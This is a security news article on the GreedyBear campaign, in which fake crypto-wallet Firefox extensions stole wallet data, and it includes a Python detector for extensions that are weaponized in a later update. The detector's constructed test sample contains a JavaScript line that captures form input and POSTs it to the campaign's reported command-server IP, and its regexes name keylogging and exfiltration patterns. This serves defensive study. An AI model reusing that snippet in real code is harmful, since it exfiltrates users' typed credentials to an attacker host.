Analysts at Koi Security discovered the malicious GreedyBear campaign, which is active in the Mozilla add-ons store. 150 malicious Firefox extensions have stolen cryptocurrency worth over $1 million from users.
Fraudulent extensions disguised themselves as popular crypto wallet extensions of well-known platforms, including MetaMask, TronLink, Exodus, and Rabby Wallet. Initially, they were uploaded to the store without malicious code to pass inspections and remained inactive for some time to accumulate fake positive reviews.

At a later stage of the attack, the extension publishers removed the original branding, replaced it with new names and logos, and injected malicious code designed to steal wallet data and users’ IP addresses (likely for tracking or targeting purposes).
The malicious code acted as a keylogger, intercepting input data from form fields and pop-up windows, and then sending it to the attackers’ server.
Experts from Koi Security have notified Mozilla developers about their findings, and the malicious extensions have now been removed from the Firefox add-ons store.
However, researchers report that the operation extends beyond Firefox extensions: it also involves dozens of Russian-language sites offering pirated software, which help distribute some 500 different malware executables, as well as a network of sites posing as official resources of Trezor, Jupiter Wallet, and fake hardware wallet repair services.

All these sites are linked to a single IP address (185.208.156[.]66), which acts as a command server for GreedyBear.
In these cases, various trojans, info-stealers (such as Lumma), or even ransomware can be used as the malicious payload.
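The two patterns described above (an extension that ships clean and is weaponized in a later update with form-input capture and exfiltration, and a single command server reused across the campaign) lend themselves to a simple static check. The following is an added example written for this article, not code from Koi Security or Mozilla; the extension sources it scans are constructed, and the allowlisted wallet API host is hypothetical.

```python
import re

# Command-server address reported for the campaign (defanged on the page; re-fanged here for matching).
GREEDYBEAR_C2 = "185.208.156.66"

# Heuristics for keylogger-style behaviour: listening on form input events and sending data outbound.
INPUT_CAPTURE = re.compile(r"addEventListener\(\s*['\"](input|keydown|keyup|keypress)['\"]", re.I)
EXFIL_CALL = re.compile(r"\b(fetch|XMLHttpRequest|navigator\.sendBeacon)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")


def indicators(source: str, allowed_hosts: set[str]) -> set[str]:
    """Return the set of suspicious indicators found in one version of an extension's script."""
    found = set()
    if GREEDYBEAR_C2 in source:
        found.add("known-c2")
    if INPUT_CAPTURE.search(source):
        found.add("input-capture")
    contacted = set(URL_HOST.findall(source))
    # An outbound call is only suspicious when it targets a host the extension is not expected to use.
    if EXFIL_CALL.search(source) and (contacted - allowed_hosts):
        found.add("outbound-to-unlisted-host")
    return found


def flag_update(previous: str, current: str, allowed_hosts: set[str]) -> set[str]:
    """Indicators that appear only in the newer version: the 'upload clean, weaponize later' pattern."""
    return indicators(current, allowed_hosts) - indicators(previous, allowed_hosts)


# Constructed sample: version 1 only queries a (hypothetical) legitimate wallet API.
CLEAN_V1 = """
document.getElementById('refresh').addEventListener('click', () => {
  fetch('https://api.example-wallet.test/balance').then(r => r.json());
});
"""
# Constructed sample: version 2 keeps the same code but adds input capture and exfiltration to the C2.
MALICIOUS_V2 = CLEAN_V1 + """
document.addEventListener('input', e => {
  fetch('http://185.208.156.66/collect', {method: 'POST', body: e.target.value});
});
"""
ALLOWED_HOSTS = {"api.example-wallet.test"}

if __name__ == "__main__":
    print("new indicators in update:", sorted(flag_update(CLEAN_V1, MALICIOUS_V2, ALLOWED_HOSTS)))
```

Run against a real add-on, the same check would compare the script bundles of two published versions rather than the inline strings used here.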
The report also mentions that the analysis of this campaign revealed clear artifacts indicating that the attackers are using AI.
“This allows attackers to scale their operations faster and easier than ever before, diversify their payloads, and evade detection,” experts write.
Additionally, the company warned that the operators of GreedyBear are clearly considering distributing malware through the Chrome Web Store as well: researchers discovered a malicious Chrome extension called Filecoin Wallet that used the same data-stealing logic and was linked to the aforementioned IP address.
It is worth noting that in June 2025, Mozilla developers introduced a new system for early detection of add-ons related to cryptocurrency scams. It builds a risk profile for each wallet extension available in the store and automatically raises a warning once a specified threshold is reached.
These warnings are meant to prompt add-on reviewers to take a closer look at the flagged extensions, so that malware can be removed from the store before it is used to empty users’ wallets.